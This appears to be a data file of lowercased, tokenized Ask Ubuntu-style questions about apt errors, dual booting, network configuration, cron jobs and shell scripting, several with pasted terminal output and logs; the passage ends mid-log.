327658	could not run sudo apt-get update	every time i run sudo apt-get update , i get this error : w : gpg error : https : //download.01.org ubuntu release : the following signatures couldn't be verified because the public key is not available : no_pubkey a902dda375e52366 what should i do ? i 'm using ubuntu 12.04 lts .
327662	can not load gui	i 'm completely new to linux ; i managed install 12.10 today on my lenovo ideapad y510p after running into various issues . for reference , the graphics card is nvidia geforce gt750m and the drivers are up to date . during installation , i did n't get the normal purple install screen with the ubuntu logo , but a black command line type thing ; it installed fine though . i have to add 'nomodeset ' each time i start it up to prevent the screen from going blank . now that it 's finally installed , i ca n't get the gui to load . i tried used the startx command , here is the resulting xorg.0.log file . any help ?
327667	attempting to get my terminal to play a specific ogg file while i type	my end game is to get my computer to make all of the sounds from my all time favorite video game from the 90 's . i 've already found the ogg file but now i want it to play every single time i type anything in the terminal . for example : `` fjeocjrigfjrig '' would play the specified sound 14 times as i type . the clip for this is only about .3 seconds long . is this possible ? i 'd only like for this to happen while in the terminal . my google-fu turned up with nada .
327668	configuring network interfaces	i 'm having a problem bringing up eth1 and eth0 on my vmware running ubuntu 12.04 i have 2bridges and 1nat and heres my ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:7f:05:19 inet addr:10.10.10.51 bcast:10.10.10.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe7f:519/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:583 errors:0 dropped:0 overruns:0 frame:0 tx packets:117 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:76518 ( 76.5 kb ) tx bytes:18000 ( 18.0 kb ) interrupt:19 base address:0x2024 eth1 link encap : ethernet hwaddr 00:0c:29:7f:05:23 inet addr:192.168.2.60 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe7f:523/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:631 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:85875 ( 85.8 kb ) tx bytes:8921 ( 8.9 kb ) interrupt:19 base address:0x20a4 eth2 link encap : ethernet hwaddr 00:0c:29:7f:05:2d inet addr:192.168.112.205 bcast:192.168.112.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe7f:52d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:147 errors:0 dropped:0 overruns:0 frame:0 tx packets:283 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:42615 ( 42.6 kb ) tx bytes:42952 ( 42.9 kb ) interrupt:16 base address:0x2424 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:103 errors:0 dropped:0 overruns:0 frame:0 tx packets:103 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8632 ( 8.6 kb ) tx bytes:8632 ( 8.6 kb ) and heres my interfaces auto lo iface lo inet loopback auto eth2 iface eth2 inet dhcp auto eth0 iface eth0 inet static address 10.10.10.51 netmask 255.255.255.0 gateway 10.10.10.1 auto eth1 iface eth1 inet static address 192.168.2.60 netmask 255.255.255.0 gateway 192.168.2.1 and here the error i 'm having when runnign /etc/init.d/networking restart root @ ubuntu : /home/advitor # /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... * disconnecting iscsi targets ... done . * stopping iscsi initiator service ... done . * starting iscsi initiator service iscsid ... done . * setting up iscsi targets ... done . ssh stop/waiting ssh start/running , process 4394 rtnetlink answers : file exists failed to bring up eth0 . rtnetlink answers : file exists failed to bring up eth1 . i tried to run ifup -v to bring up more info regarding eth0 and eth1 and it gives me this . root @ ubuntu : /home/advitor # ifup -v eth1 configuring interface eth1=eth1 ( inet ) run-parts -- verbose /etc/network/if-pre-up.d run-parts : executing /etc/network/if-pre-up.d/ethtool run-parts : executing /etc/network/if-pre-up.d/vlan run-parts : executing /etc/network/if-pre-up.d/wireless-tools run-parts : executing /etc/network/if-pre-up.d/wpasupplicant ip addr add 192.168.2.60/255.255.255.0 broadcast + dev eth1 label eth1 rtnetlink answers : file exists failed to bring up eth1 . root @ ubuntu : /home/advitor # ifup -v eth0 configuring interface eth0=eth0 ( inet ) run-parts -- verbose /etc/network/if-pre-up.d run-parts : executing /etc/network/if-pre-up.d/ethtool run-parts : executing /etc/network/if-pre-up.d/vlan run-parts : executing /etc/network/if-pre-up.d/wireless-tools run-parts : executing /etc/network/if-pre-up.d/wpasupplicant ip addr add 10.10.10.51/255.255.255.0 broadcast + dev eth0 label eth0 rtnetlink answers : file exists failed to bring up eth0 . i hope you could guide me how to resolve this issue .
327669	files and folders in the desktop disappeared	it 's quite like this question . but there is a little bit difference . in my situation , all files and folders in the desktop were disappeared . and when i right clicked on the desktop , the drop-down box did n't appear . whatever operation i did , nothing happened . but when i opened the home folder , and access the desktop folder from it , files and folders were there . and i could operate the files as usual . so i wonder how to get my files and folders back to the desktop .
327673	how to highlight non-consecutive text in gedit ?	is there any short-cut/keyboard command to highlight , i.e. , select , non-consecutive text in gedit ? for instance , say i want to highlight the words there and text in the previous sentence at the same time so that i can copy the information .
327676	dual boot menu with ubuntu and windows 8 not showing up	i know a lot of posts have been written , and i had read most of them when i encountered the problem . none of them solved the problem . i have successfully installed ubuntu 12.04 on top of windows 8 . now my pc simply boots into windows 8 . if i press 'esc ' at start of bios , and then f9 , the grub shows up and ubuntu is listed at the top of the several options to boot from . i did run boot-repair once i logged into ubuntu explicitly from grub as mentioned above . i did all said by stormvirux in this link , but was still unsuccessful . the debug info is listed here . something which confuses me is the message which boot-repair stated after it did its job . you can now reboot your computer . please do not forget to make your bios boot on sda ( 8004mb ) disk ! the boot files of [ the os now in use - ubuntu 12.04.2 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) i do n't know why it says it is far from the start of the disk as i see it first in the grub menu which comes up at startup . one more input , when i try to place the grub in sda , boot-repair does not progress giving me the following error : gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . alternatively , you can retry after activating the [ separate /boot/efi partition : ] option . i had to select separate /boot/efi partition : sdb2
327679	persist screen resolution for server 13.04	i 'd like to increase the screen resolution on a fresh 13.04 server install . i can set nomodeset vga=791 after pressing e during the grub bootload , but i can not find where to persist this value . i beleieve it should be set in /etc/grub.d/00_header , but i 'm not sure where . update contents of /etc/initramfs-tools/modules is # list of modules that you want to include in your initramfs . # they will be loaded at boot time in the order below . # # syntax : module_name [ args ... ] # # you must run update-initramfs ( 8 ) to effect this change . # # examples : # # raid1 # sd_mod uvesafb
327682	will my laptop run raring ringtail without problems ?	intel i5 core processor ( 2.6ghz ) 4gb of ddr3 ram 500gb hard drive integrated graphics ( intel hd graphics 4000 )
327687	is there a way to make gnome3 the default session when connecting to xrdp ?	i have an ubuntu server running gnome3 on the desktop and xrdp . when i establish an rdp session to the ubuntu server i get a gnome classic session . is there a way to set the default session for xrdp to gnome3 ? sorry for my ignorance but i am new to this forum and a noobie . thanks for any help you can provide .
327695	set command ca n't handle lines constituting of a \n ( word/line counting script )	i have a problem with execution of a while loop , i have found out that the problem involves the execution of the set command , the assigment of the \n character to an environmental variable constitutes a problem . why does it happen and how to solve it ? my code is : echo `` enter a filename : \c '' read fname terminal=`tty` exec < $ fname nol=0 now=0 while read line do nol=`expr $ nol + 1` set $ line now=`expr $ now + $ # ` done echo `` number of lines : $ nol '' echo `` number of words : $ now '' exec < $ terminal when it encounters a line with nothing but a newline character in it , it prints system data and all of the variables : cinnamon_version='1.8.8' colorterm='gnome-terminal' ( ... ) fname='drunk' line= '' nol='19' now='137' terminal='/dev/pts/0' ( ... ) indicates omission of an entire block of system data
327697	english-hindi dictionary	do we know if any english to hindi language dictionary is available for ubuntu ?
327698	simply , running an ubuntu server through virtualbox ?	when i go through official documentation ( which is n't so great ) i can not figure out how to run an ubuntu sever through virtual box . i can not find an option , and my iso is never a proper iso to boot from in the storage options ... any help would be great or maybe pointing me to a good tutorial would be awesome . i just want to mess around and see what up . thanks .
327705	command line rename korean file name	i 've this file i just downloaded with the name 최고다 이순신.e39.130720.hdtv.xvid-hanrel.avi , and i 've the subtitle file you're.the.best.lee.soon.shin.e39.130720.hdtv.h264.720p-kor.srt . how can i rename the video file ( in command line ) with the same name as the subtitle file ? you're.the.best.lee.soon.shin.e39.130720.hdtv.h264.720p-kor.avi you're.the.best.lee.soon.shin.e39.130720.hdtv.h264.720p-kor.srt
327706	how secure is root read-permissions ?	how secure is a file whos permissions are set so only root has any privileges with the file ? say i had the file on an unencrypted ext4 partition , would i be able to boot up another live os , copy the file off of the partition , and read it ? my question is , can another os copy a root file off a partition , and is there any limitation to what that other os can do with it ?
327714	abort after selecting y for continue	i have just installed ubuntu 12.10 . when i want to update and upgrade to 13.04 , but this is what i get : jeremiah @ jeremiah-aspire-5315 : ~ $ sudo apt-get update & & sudo apt-get dist-upgrade [ sudo ] password for jeremiah : ign http : //extras.ubuntu.com quantal inrelease get:1 http : //extras.ubuntu.com quantal release.gpg [ 72 b ] ign http : //archive.canonical.com quantal inrelease hit http : //extras.ubuntu.com quantal release get:2 http : //archive.canonical.com quantal release.gpg [ 933 b ] ign http : //extras.ubuntu.com quantal release get:3 http : //archive.canonical.com quantal release [ 7,078 b ] ign http : //extras.ubuntu.com quantal/main sources/diffindex get:4 http : //archive.canonical.com quantal/partner sources [ 3,593 b ] ign http : //extras.ubuntu.com quantal/main i386 packages/diffindex get:5 http : //archive.canonical.com quantal/partner i386 packages [ 5,817 b ] hit http : //extras.ubuntu.com quantal/main sources hit http : //extras.ubuntu.com quantal/main i386 packages ign http : //archive.ubuntu.com quantal inrelease ign http : //archive.ubuntu.com quantal-updates inrelease ign http : //archive.ubuntu.com quantal-backports inrelease ign http : //archive.ubuntu.com quantal-security inrelease ign http : //archive.canonical.com quantal/partner translation-en_us get:6 http : //archive.ubuntu.com quantal release.gpg [ 933 b ] ign http : //archive.canonical.com quantal/partner translation-en get:7 http : //archive.ubuntu.com quantal-updates release.gpg [ 933 b ] ign http : //extras.ubuntu.com quantal/main translation-en_us get:8 http : //archive.ubuntu.com quantal-backports release.gpg [ 933 b ] ign http : //extras.ubuntu.com quantal/main translation-en get:9 http : //archive.ubuntu.com quantal-security release.gpg [ 933 b ] get:10 http : //archive.ubuntu.com quantal release [ 49.6 kb ] get:11 http : //archive.ubuntu.com quantal-updates release [ 49.6 kb ] get:12 http : //archive.ubuntu.com quantal-backports release [ 49.6 kb ] get:13 http : //archive.ubuntu.com quantal-security release [ 49.6 kb ] get:14 http : //archive.ubuntu.com quantal/main sources [ 872 kb ] get:15 http : //archive.ubuntu.com quantal/restricted sources [ 5,646 b ] get:16 http : //archive.ubuntu.com quantal/universe sources [ 5,522 kb ] 34 % [ 16 sources 1,173 kb/5,522 kb 21 % ] 61.9 kb/s 1min 10s^get:17 http : //archive.ubuntu.com quantal/multiverse sources [ 166 kb ] get:18 http : //archive.ubuntu.com quantal/main i386 packages [ 1,136 kb ] get:19 http : //archive.ubuntu.com quantal/restricted i386 packages [ 8,387 b ] get:20 http : //archive.ubuntu.com quantal/universe i386 packages [ 5,285 kb ] get:21 http : //archive.ubuntu.com quantal/multiverse i386 packages [ 133 kb ] hit http : //archive.ubuntu.com quantal/main translation-en get:22 http : //archive.ubuntu.com quantal/multiverse translation-en [ 100 kb ] hit http : //archive.ubuntu.com quantal/restricted translation-en get:23 http : //archive.ubuntu.com quantal/universe translation-en [ 3,648 kb ] get:24 http : //archive.ubuntu.com quantal-updates/main sources [ 108 kb ] get:25 http : //archive.ubuntu.com quantal-updates/restricted sources [ 2,564 b ] get:26 http : //archive.ubuntu.com quantal-updates/universe sources [ 89.8 kb ] get:27 http : //archive.ubuntu.com quantal-updates/multiverse sources [ 3,985 b ] get:28 http : //archive.ubuntu.com quantal-updates/main i386 packages [ 276 kb ] get:29 http : //archive.ubuntu.com quantal-updates/restricted i386 packages [ 4,841 b ] get:30 http : //archive.ubuntu.com quantal-updates/universe i386 packages [ 199 kb ] get:31 http : //archive.ubuntu.com quantal-updates/multiverse i386 packages [ 11.0 kb ] get:32 http : //archive.ubuntu.com quantal-updates/main translation-en [ 135 kb ] get:33 http : //archive.ubuntu.com quantal-updates/multiverse translation-en [ 6,183 b ] get:34 http : //archive.ubuntu.com quantal-updates/restricted translation-en [ 1,477 b ] get:35 http : //archive.ubuntu.com quantal-updates/universe translation-en [ 105 kb ] get:36 http : //archive.ubuntu.com quantal-backports/main sources [ 14 b ] get:37 http : //archive.ubuntu.com quantal-backports/restricted sources [ 14 b ] get:38 http : //archive.ubuntu.com quantal-backports/universe sources [ 17.9 kb ] get:39 http : //archive.ubuntu.com quantal-backports/multiverse sources [ 2,413 b ] get:40 http : //archive.ubuntu.com quantal-backports/main i386 packages [ 14 b ] get:41 http : //archive.ubuntu.com quantal-backports/restricted i386 packages [ 14 b ] get:42 http : //archive.ubuntu.com quantal-backports/universe i386 packages [ 22.3 kb ] get:43 http : //archive.ubuntu.com quantal-backports/multiverse i386 packages [ 2,465 b ] get:44 http : //archive.ubuntu.com quantal-backports/main translation-en [ 14 b ] get:45 http : //archive.ubuntu.com quantal-backports/multiverse translation-en [ 2,090 b ] get:46 http : //archive.ubuntu.com quantal-backports/restricted translation-en [ 14 b ] get:47 http : //archive.ubuntu.com quantal-backports/universe translation-en [ 19.0 kb ] get:48 http : //archive.ubuntu.com quantal-security/main sources [ 54.7 kb ] get:49 http : //archive.ubuntu.com quantal-security/restricted sources [ 1,833 b ] get:50 http : //archive.ubuntu.com quantal-security/universe sources [ 20.0 kb ] get:51 http : //archive.ubuntu.com quantal-security/multiverse sources [ 696 b ] get:52 http : //archive.ubuntu.com quantal-security/main i386 packages [ 152 kb ] get:53 http : //archive.ubuntu.com quantal-security/restricted i386 packages [ 3,531 b ] get:54 http : //archive.ubuntu.com quantal-security/universe i386 packages [ 58.1 kb ] get:55 http : //archive.ubuntu.com quantal-security/multiverse i386 packages [ 1,396 b ] get:56 http : //archive.ubuntu.com quantal-security/main translation-en [ 79.7 kb ] get:57 http : //archive.ubuntu.com quantal-security/multiverse translation-en [ 587 b ] get:58 http : //archive.ubuntu.com quantal-security/restricted translation-en [ 1,066 b ] get:59 http : //archive.ubuntu.com quantal-security/universe translation-en [ 35.2 kb ] ign http : //archive.ubuntu.com quantal/main translation-en_us ign http : //archive.ubuntu.com quantal/multiverse translation-en_us ign http : //archive.ubuntu.com quantal/restricted translation-en_us ign http : //archive.ubuntu.com quantal/universe translation-en_us ign http : //archive.ubuntu.com quantal-updates/main translation-en_us ign http : //archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //archive.ubuntu.com quantal-updates/universe translation-en_us ign http : //archive.ubuntu.com quantal-backports/main translation-en_us ign http : //archive.ubuntu.com quantal-backports/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-backports/restricted translation-en_us ign http : //archive.ubuntu.com quantal-backports/universe translation-en_us ign http : //archive.ubuntu.com quantal-security/main translation-en_us ign http : //archive.ubuntu.com quantal-security/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-security/restricted translation-en_us ign http : //archive.ubuntu.com quantal-security/universe translation-en_us fetched 18.5 mb in 7min 2s ( 43.8 kb/s ) reading package lists ... done w : gpg error : http : //extras.ubuntu.com quantal release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : linux-headers-3.5.0-37 linux-headers-3.5.0-37-generic linux-image-3.5.0-37-generic linux-image-extra-3.5.0-37-generic the following packages will be upgraded : account-plugin-facebook account-plugin-flickr account-plugin-google account-plugin-icons account-plugin-identica account-plugin-twitter account-plugin-windows-live accountsservice activity-log-manager-common activity-log-manager-control-center adium-theme-ubuntu alsa-base alsa-utils app-install-data-partner apparmor appmenu-gtk appmenu-gtk3 apport apport-gtk apt apt-transport-https apt-utils aptdaemon aptdaemon-data at-spi2-core bamfdaemon base-files bind9-host brasero brasero-cdrkit brasero-common busybox-initramfs busybox-static compiz compiz-core compiz-gnome compiz-plugins-default consolekit coreutils cups cups-bsd cups-client cups-common cups-filters cups-ppdc dbus dbus-x11 dconf-gsettings-backend dconf-service dconf-tools deja-dup dmsetup dnsutils duplicity evolution-data-server evolution-data-server-common file-roller firefox firefox-globalmenu firefox-gnome-support firefox-locale-en fonts-opensymbol gedit gedit-common gir1.2-atspi-2.0 gir1.2-dee-1.0 gir1.2-goa-1.0 gir1.2-gst-plugins-base-0.10 gir1.2-gtk-3.0 gir1.2-javascriptcoregtk-3.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-unity-5.0 gir1.2-webkit-3.0 gnome-control-center gnome-control-center-data gnome-games-data gnome-keyring gnome-mahjongg gnome-online-accounts gnome-orca gnome-screensaver gnome-session gnome-session-bin gnome-session-common gnome-settings-daemon gnome-sudoku gnome-system-log gnomine gnupg gpgv gstreamer0.10-alsa gstreamer0.10-gconf gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gstreamer0.10-x gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter im-switch indicator-appmenu indicator-datetime iptables isc-dhcp-client isc-dhcp-common libaccountsservice0 libapt-inst1.5 libapt-pkg4.12 libasound2 libatspi2.0-0 libbamf3-0 libbind9-80 libboost-date-time1.49.0 libbrasero-media3-1 libc-bin libc-dev-bin libc6 libc6-dev libcairo-gobject2 libcairo2 libcamel-1.2-40 libck-connector0 libcompizconfig0 libcroco3 libcups2 libcupscgi1 libcupsfilters1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3 libcurl3-gnutls libcurl3-nss libdbus-1-3 libdbus-glib-1-2 libdconf1 libdecoration0 libdee-1.0-4 libdevmapper-event1.02.1 libdevmapper1.02.1 libdns81 libdrm-intel1 libdrm-nouveau1a libdrm-nouveau2 libdrm-radeon1 libdrm2 libebackend-1.2-5 libebook-1.2-14 libecal-1.2-15 libedata-book-1.2-15 libedata-cal-1.2-18 libedataserver-1.2-17 libfontembed1 libfreetype6 libfs6 libgail-3-0 libgcrypt11 libgeis1 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglib2.0-0 libglib2.0-bin libglib2.0-data libgnome-control-center1 libgnutls26 libgoa-1.0-0 libgoa-1.0-common libgpod-common libgpod4 libgstreamer-plugins-base0.10-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libgwibber-gtk3 libgwibber3 libimobiledevice3 libisc83 libisccc80 libisccfg82 libjack-jackd2-0 libjavascriptcoregtk-3.0-0 libkms1 liblcms2-2 liblvm2app2.2 liblwres80 libnautilus-extension1a libnspr4 libnss3 libnss3-1d libnux-3.0-0 libnux-3.0-common libpam-ck-connector libpam-gnome-keyring libpam-xdg-support libperl5.14 libpoppler-glib8 libpoppler28 libpulse-mainloop-glib0 libpulse0 libpulsedsp libpurple-bin libpurple0 libpython2.7 libpython3.2 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libraw5 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-ogltrans libreoffice-pdfimport libreoffice-presentation-minimizer libreoffice-presenter-console libreoffice-style-human libreoffice-style-tango libreoffice-writer librhythmbox-core6 libsecret-1-0 libsecret-common libssh-4 libssl1.0.0 libtelepathy-logger2 libtiff5 libtotem0 libudisks2-0 libufe-xidgetter0 libunity-core-6.0-5 libunity-protocol-private0 libunity-webapps0 libunity9 libusbmuxd2 libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libwhoopsie0 libx11-6 libx11-data libx11-xcb1 libxatracker1 libxcb-dri2-0 libxcb-glx0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb1 libxcursor1 libxext6 libxfixes3 libxi6 libxinerama1 libxml2 libxp6 libxrandr2 libxrender1 libxres1 libxslt1.1 libxt6 libxtst6 libxv1 libxvmc1 libxxf86dga1 libxxf86vm1 lintian linux-firmware linux-generic linux-headers-generic linux-headers-generic-pae linux-image-generic linux-libc-dev linux-sound-base lsb-base lsb-release memtest86+ mountall multiarch-support nautilus nautilus-data nux-tools openssl overlay-scrollbar overlay-scrollbar-gtk2 overlay-scrollbar-gtk3 perl perl-base perl-modules poppler-utils pulseaudio pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python python-apport python-apt python-apt-common python-aptdaemon python-aptdaemon.gtk3widgets python-dbus python-dbus-dev python-gi python-gi-cairo python-gobject python-libxml2 python-minimal python-problem-report python-uno python2.7 python2.7-minimal python3 python3-apport python3-apt python3-aptdaemon python3-aptdaemon.gtk3widgets python3-aptdaemon.pkcompat python3-dbus python3-distupgrade python3-gi python3-gi-cairo python3-minimal python3-problem-report python3-update-manager python3.2 python3.2-minimal qdbus remote-login-service rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rsyslog seahorse shotwell signon-plugin-oauth2 software-center sudo telepathy-gabble telepathy-idle telepathy-logger thunderbird thunderbird-globalmenu thunderbird-gnome-support totem totem-common totem-mozilla totem-plugins transmission-common transmission-gtk ubuntu-drivers-common ubuntu-release-upgrader-core ubuntu-release-upgrader-gtk udisks2 ufw unity unity-common unity-greeter unity-lens-applications unity-lens-files unity-lens-gwibber unity-lens-photos unity-lens-video unity-scope-video-remote unity-services unity-webapps-common unity-webapps-service uno-libs3 update-manager update-manager-core ure usbmuxd vim-common vim-tiny vino whoopsie x11-apps xdiagnose xserver-common xserver-xorg-core xserver-xorg-video-intel xserver-xorg-video-openchrome xul-ext-ubufox xul-ext-unity 410 upgraded , 4 newly installed , 0 to remove and 0 not upgraded . need to get 342 mb of archives . after this operation , 177 mb of additional disk space will be used . do you want to continue [ y/n ] ? y abort . jeremiah @ jeremiah-aspire-5315 : ~ $ what went wrong ? or is there an easier way to upgrade ?
327717	booting from sd	attempting to boot from a 16gb sdhc card on an hp probook 4530s . used universal usb installer ( pendrive ) supplied via link from ubuntu.com to create the bootable drive . in the start up menu , i choose the sd card as the boot device , it starts , shows some script , shows the ubuntu installing screen for a lengthy while , back to script then '' unable to find medium containing live file stream '' comp is currently running win7 prof 64bit trying to load ubuntu 13.04 amd64 . not sure if this matters , but it cant hurt : i5 quad core 2.3ghz 8gb ddr3 intel hd graphics
327719	ubuntu restarts on shutdown/hibernation commands , instead of shutdown	friends , whenever i am going to shutdown/hibernate my ubuntu pc its restarting after completing their process . mean to say if press shutdown button its shutdown properly and switch off the display but suddenly its restart . any suggestion ?
327721	how do i get ubuntu 13.04 to recognize my pre-installed windows 8 os ?	i am completely new to installing ubuntu . i really wanted an easy install however it seems that is impossible . i am familiar with using ubuntu though and i would like to be able to have it on this computer . i checked my partitions and i have 5 . 4 of which are recovery partitions . i can not find a video online of how to get it to work like this with my current setup . i can not stress enough that the explanation will have to be painfully simple . i may not be able to run ubuntu on my pc if this is a complicated fix . thanks in advance .
327722	php script not executed by crontab	i have setup a cron to execute one of my php scripts . but the problem is the php script is not being executed at all not even partially . here is the cron i have set up 45 23 * * * /usr/bin/php -q /var/www/myscript.php i have tried the following i removed the cron from normal user to root user still no results . i changed the permissions on the script using chmod +x /var/www/myscript.php i have used the command whereis php it gives the following php : /usr/bin/php /usr/share/man/man1/php.1.gz now , i do n't know what else i can do . please help . p.s . i can execute the script manully and it runs perfectly .
327723	how do i add archive folder to dolphin in xubuntu ?	when i right-click on a folder in dolphin there is no option to compress that folder . how can i add this to the context-menu of a folder like : create archive from folder -- > zip , rar,7z , ...
327724	no internet access via pptp client	recently i installed ubuntu 12.04 lts ; i have a problem with connecting to internet via pptp client connection i will connect to wireless connection of my college then pppoe connection and then pptp for internet access ! i connect to wifi and pppoe successfully that i can only access to college website . then i connect to pptp but i lost all my internet access ( ping & browse ) ; this is my ifconfig result : ppp0 link encap : point-to-point protocol inet addr:192.168.11.37 p-t-p:192.168.11.10 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1488 metric:1 rx packets:297 errors:0 dropped:0 overruns:0 frame:0 tx packets:374 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:23812 ( 23.8 kb ) tx bytes:26959 ( 26.9 kb ) ppp1 link encap : point-to-point protocol inet addr:176.102.250.25 p-t-p:176.102.224.55 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1408 metric:1 rx packets:169 errors:0 dropped:0 overruns:0 frame:0 tx packets:173 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:10241 ( 10.2 kb ) tx bytes:10541 ( 10.5 kb ) wlan0 link encap : ethernet hwaddr 20:7c:8f:3b : f0 : ee inet addr:192.168.193.154 bcast:192.168.193.255 mask:255.255.255.0 inet6 addr : fe80 : :227c:8fff : fe3b : f0ee/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13292 errors:0 dropped:3 overruns:0 frame:0 tx packets:1243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2158036 ( 2.1 mb ) tx bytes:160543 ( 160.5 kb ) and my route -n result : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 ppp1 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 ppp0 176.102.224.55 0.0.0.0 255.255.255.255 uh 0 0 0 ppp1 192.168.11.10 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 192.168.100.55 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 192.168.193.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 ppp0 is for pppoe , ppp1 for pptp and wlan0 is for my wireless my syslog show : aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : joining mdns multicast group on interface wlan0.ipv4 with address 192.168.193.154 . aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : new relevant interface wlan0.ipv4 for mdns . aug 2 12:34:17 fman-q1585m avahi-daemon [ 861 ] : registering new address record for 192.168.193.154 on wlan0.ipv4 . aug 2 12:34:17 fman-q1585m kernel : [ 940.384157 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready aug 2 12:35:02 fman-q1585m kernel : [ 984.933056 ] wlan0 : authenticate with 00:15:6d : f8:09:6d aug 2 12:35:02 fman-q1585m kernel : [ 984.953053 ] wlan0 : send auth to 00:15:6d : f8:09:6d ( try 1/3 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.956477 ] wlan0 : authenticated aug 2 12:35:02 fman-q1585m kernel : [ 984.968881 ] wlan0 : associate with 00:15:6d : f8:09:6d ( try 1/3 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.977656 ] wlan0 : rx assocresp from 00:15:6d : f8:09:6d ( capab=0x421 status=0 aid=7 ) aug 2 12:35:02 fman-q1585m kernel : [ 984.978665 ] wlan0 : associated aug 2 12:35:02 fman-q1585m kernel : [ 984.978968 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :227c:8fff : fe3b : f0ee . aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : new relevant interface wlan0.ipv6 for mdns . aug 2 12:35:04 fman-q1585m avahi-daemon [ 861 ] : registering new address record for fe80 : :227c:8fff : fe3b : f0ee on wlan0.* . aug 2 12:35:33 fman-q1585m dhclient : dhcprequest of 192.168.193.154 on wlan0 to 255.255.255.255 port 67 aug 2 12:35:33 fman-q1585m dhclient : dhcpack of 192.168.193.154 from 192.168.189.2 aug 2 12:35:33 fman-q1585m dhclient : bound to 192.168.193.154 -- renewal in 33990 seconds . aug 2 12:36:06 fman-q1585m pppd [ 2908 ] : plugin rp-pppoe.so loaded . aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : pppd 2.4.5 started by root , uid 0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : ppp session is 1513 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : connected to d4 : ca:6d:89:1d : fa via interface wlan0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : using interface ppp0 aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : connect : ppp0 < -- > wlan0 aug 2 12:36:06 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) aug 2 12:36:06 fman-q1585m networkmanager [ 866 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : remote message : login ok aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : pap authentication succeeded aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : peer from calling number d4 : ca:6d:89:1d : fa authorized aug 2 12:36:06 fman-q1585m pppd [ 2910 ] : replacing old default route to wlan0 [ 